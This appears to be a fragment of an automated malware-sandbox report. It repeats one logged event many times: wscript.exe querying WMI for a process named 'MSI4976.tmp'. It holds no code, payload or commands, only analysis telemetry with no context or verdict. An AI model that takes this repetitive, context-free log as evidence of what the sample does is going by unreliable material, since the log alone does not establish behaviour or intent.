              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
